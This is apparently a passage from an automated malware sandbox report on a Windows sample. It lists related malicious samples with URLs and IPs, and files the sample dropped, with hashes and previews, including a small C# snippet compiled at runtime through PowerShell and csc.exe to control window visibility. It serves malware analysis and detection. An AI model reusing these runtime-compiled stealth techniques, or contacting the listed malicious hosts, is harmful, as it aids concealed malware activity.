                                                                                                                                                  http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.129.140
                                                                                                                                                  FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.2.133
                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                  • 185.199.109.133

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\ProgramData\dllname.dir

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16
                                                                                                                                                  Entropy (8bit):3.75
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:TVwTB9R:TVwNP
                                                                                                                                                  MD5:9A67F3B2DB49B9E3CBC3AB754E98F999
                                                                                                                                                  SHA1:7601692F0A66012FD59816BBA1FD212DBB2D3557
                                                                                                                                                  SHA-256:5CA1760126A2DDDB046A097A036CDEAFC5A4F38113832EEC2E645417F75B2820
                                                                                                                                                  SHA-512:5773417E935609520082D0D6D4F07435EC208D93D49C3455DFFEE7D99331F7E7848E3246B2B6E325696954312394BAA7FF09FE4801554E4A0AD87CE8CA61A638
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:dGhlYXB0Z3JvdXA=

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1564
                                                                                                                                                  Entropy (8bit):5.645920333790338
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:DSU4y4RQmFoUeCamfm9qr9tK8NLyAHu9OjlZS5GF7:GHyIFKL2O9qr2KLynOZZ4w7
                                                                                                                                                  MD5:A29D872777A7CDD12F5293B858D75671
                                                                                                                                                  SHA1:04B74019374D5D0CF0004FD0E0077EDED7AD5BF9
                                                                                                                                                  SHA-256:A333C74165F97F0715B8E08BCC97144937FEC09189CF0C36913591037EAEE617
                                                                                                                                                  SHA-512:D9BF5518C96ED31EE89FCF35BB5D9F2D4CCB7C81AC4531E546F502A4B3909ABC060150FEBC666C3F019FB586698D26786F85CC44B8F4A2C90B6A9B6A33EBE359
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:@...e...........\...................^................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESD9CB.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Jan 2 09:36:01 2025, 1st section name ".debug$S"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1332
                                                                                                                                                  Entropy (8bit):3.9952282881819
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:HvCFzW916yIPxHPwKqxmNII+ycuZhNnoakSE9PNnqS2d:2yKx4Kqxmu1uloa3UqSG
                                                                                                                                                  MD5:4D33362B5853BC00DB2FB1B764DC7A28
                                                                                                                                                  SHA1:3D1731CB6B20B0C46C2B1B0373D325197E7347B7
                                                                                                                                                  SHA-256:BADE44C9E5CFEF9F6E7FEC44400B11C47D4893CBADE67832067C48E5219682C9
                                                                                                                                                  SHA-512:21811DFE1F4E2B8584D580431998FD3108B40FEFEDC32D5455CAE722E16792B2A4CFD51954F22E252268C6DFBFC8576287A66EFCC7C3F09591444668C659DEB4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L....^vg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP...............U.2......F.,z..D..........5.......C:\Users\user\AppData\Local\Temp\RESD9CB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESE63E.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Jan 2 09:36:05 2025, 1st section name ".debug$S"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1336
                                                                                                                                                  Entropy (8bit):4.004830406527154
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:HLzgm9pwPH2wKqxmNII+ycuZhNgakSMPNnqSSd:PwP1Kqxmu1ulga3cqSC
                                                                                                                                                  MD5:26AAF69AAE381A06463B1C610B76954D
                                                                                                                                                  SHA1:B64E6314099355B558CECA41A2A29C93BDB0E909
                                                                                                                                                  SHA-256:A486C5290026C4359B6B78EBB171726BA6A10D2C7E11DC595DA8C5823B7F0311
                                                                                                                                                  SHA-512:E36E9FD78C7C67B3436968DB8410AB8AF8C2BE4F716656497762777228E6B86A633D3956E758ABE4CE216016F6E13882EAD665E91B09D9EF67F5525668E426B5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L....^vg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP..................qx.}..X..:."..............5.......C:\Users\user\AppData\Local\Temp\RESE63E.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzdhsljb.hpa.ps1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkyqpbz5.c21.psm1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipfqxlcs.swm.ps1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it04jtus.rkw.psm1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.0978688578700635
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynl1Gak7Ynqqsl1XPN5Dlq5J:+RI+ycuZhNnoakSE9PNnqX
                                                                                                                                                  MD5:558332FCB2A7F79ED946C52C7A13F044
                                                                                                                                                  SHA1:C999C2E8903B71D18FDE410CEEAA948EF056EE8A
                                                                                                                                                  SHA-256:C6EB01925DC95A9D7E02FF3EB3D03B259AB781A15A5A57A390B5B5ACCA08EF6E
                                                                                                                                                  SHA-512:CE197E3D130E6CFC1EAB58A2DE42D6123C701F181304ADA929B8BFA749A349095D2BE767C6AF1FAC524006477D71F2BE5BFA43C64EF337630C48670B6C080D4F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):353
                                                                                                                                                  Entropy (8bit):4.82408068685792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
                                                                                                                                                  MD5:379570600F5439DDA873EDA8F0CE4A79
                                                                                                                                                  SHA1:2023B772101AFF5B12AB53F24A69742A4B9C394F
                                                                                                                                                  SHA-256:2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
                                                                                                                                                  SHA-512:70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:. using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):371
                                                                                                                                                  Entropy (8bit):5.210776906296263
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fZVUzxs7+AEszI923fZh9n:p37Lvkmb6Kz/UWZE2r9n
                                                                                                                                                  MD5:A0DC6A6079BD848345C6F5E483ADC8D4
                                                                                                                                                  SHA1:7BD165479F63DB7304136AD710EF0CA721D7FF10
                                                                                                                                                  SHA-256:2968E71C1C0EE777B15D76BC45C1A392B51BB4EB10DB8701FE8DD0E7570B10F6
                                                                                                                                                  SHA-512:41C0192F3D81125BE0799881458732912F4817A6D26583CD426BC9AF8E803478EEA2D9A4345987C2291D79F7C6900BA1204F203A79EFB3A43337FD1A090E26F2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs"

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.9189758085688093
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGS7e5GIYq/dudQ8OUxkjvtkZfy908NoVWI+ycuZhNnoakSE9PNnq:65InudjxijOJy90Yl1uloa3Uq
                                                                                                                                                  MD5:FACA41537876BFB3C57CCC666C383B2A
                                                                                                                                                  SHA1:EC5BEACBDE950E78B61A01C0201AF57D9BF15AF4
                                                                                                                                                  SHA-256:A9DDE2BA730F709E507E70007EC60E5E606EA0781D3EC73A1CB0AEF6A67A93B8
                                                                                                                                                  SHA-512:B2E7E7028964848733289D9B940596A889544D2E276A691755D342BB350D8FA27795EAFDF244B8FF50316FEF9BC268D1941EA04B6455288D568C9F220E7D2537
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^vg...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.out

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):872
                                                                                                                                                  Entropy (8bit):5.300650136629573
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KMoId3ka6KzNE2r9uKax5DqBVKVrdFAMBJTH:dokka6aNE2r9uK2DcVKdBJj
                                                                                                                                                  MD5:493E01DADE41B80BB4521AC8951D357F
                                                                                                                                                  SHA1:D65B258E175AF6756B6F55B9D970E1A44189462B
                                                                                                                                                  SHA-256:3B56735A252039DF6DF9FE756627AEDE226C72C5880F9E0E2421F93A8811B2E6
                                                                                                                                                  SHA-512:7F8264F9EBC7C67BC3F1D1A203855BAFFBECF0522E2C117CA49F41841848CA5CA0A2B68762BF19D01B47AD6D28F668F175260FD76B2596B29E79D781F4AA01C7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.1229792038504645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryaFak7YnqqRqPN5Dlq5J:+RI+ycuZhNgakSMPNnqX
                                                                                                                                                  MD5:7178CA7DB3AA58CC0E3A7F227F81C7DE
                                                                                                                                                  SHA1:1D95D38A287C21282C44F820FA56E4AC805AA322
                                                                                                                                                  SHA-256:710A61160B666E2FF11EAC7EE9BBD2CCA69B716BDAD5B8AC27E818E541C43DF6
                                                                                                                                                  SHA-512:D8A58F5883E0A704A1B757A637DCE261D2CC037D6B5A1966F252C88D4C835C873E70431E5F084A73BA87E67BE092648DE4E9176AB29226827B749BE515490D46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.0.cs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):353
                                                                                                                                                  Entropy (8bit):4.82408068685792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
                                                                                                                                                  MD5:379570600F5439DDA873EDA8F0CE4A79
                                                                                                                                                  SHA1:2023B772101AFF5B12AB53F24A69742A4B9C394F
                                                                                                                                                  SHA-256:2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
                                                                                                                                                  SHA-512:70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:. using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):371
                                                                                                                                                  Entropy (8bit):5.257476551094234
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f+TmV0mD+zxs7+AEszI923f+TmV0mP:p37Lvkmb6Kz90c+WZE290G
                                                                                                                                                  MD5:0F19088A0071F778E46A51B0C3BE55F8
                                                                                                                                                  SHA1:66B1D544E4D6C0C4946EBB7754D719E154D590AC
                                                                                                                                                  SHA-256:BCD7B818953882F25936A9D28D2AB7A315AA513337916BB8C5C8A8A5DC722F71
                                                                                                                                                  SHA-512:089EFDDF89899311B727CA1E14F45A0BB8F98188F79F0E72E910C8F1ED12BA2796FF22521B61F02C9419C34FCEBFC2F06BFC005880EA16FC380721552D0913FB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.0.cs"

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.9202395866073805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSJ5GIYq/dudQ8OZAmGxkjvtkZfq9M78NoVWI+ycuZhNgakSMPNnq:6iInudjVijOJq9M7Yl1ulga3cq
                                                                                                                                                  MD5:DC65FCDAB4B20B7CA4E069DAC8E52141
                                                                                                                                                  SHA1:BFDC7FFA6A79D5ED9F753E9D827A65231A3D038C
                                                                                                                                                  SHA-256:3441D9BD91542289222748B31C703B28499E26D98A6871FBCD10F91E7CF9C0D7
                                                                                                                                                  SHA-512:672CB11F7853694D1829004627DE041DD27B9C9FDA7A5960EADDF33CC522F1C7A007C21E06C76E94E3C56119D914BBBAC2AE6604FEA2E43338E854D706FD23D7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^vg...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.out

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):872
                                                                                                                                                  Entropy (8bit):5.327698957460308
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KMoId3ka6Kz90c/E290HKax5DqBVKVrdFAMBJTH:dokka6a9jE29+K2DcVKdBJj
                                                                                                                                                  MD5:524A6EBF97ADD3A770C1865BDE8FD62C
                                                                                                                                                  SHA1:9CB753D2A635EFDDD505A41A26C36A760168E87A
                                                                                                                                                  SHA-256:3B94411FC235672ECAE846C579D8F1CD5395711C440C0C7B8F494A57434D973F
                                                                                                                                                  SHA-512:88C61A81FE8CE2D3CE38DAE0EC284F49EA2278C178C074A9C2890B870A77A8DA762D73498E2CFFAABF32484CF8FF671B46ED205F3AD420E32CB10DC9A3306A3C
                                                                                                                                                  Malicious:false
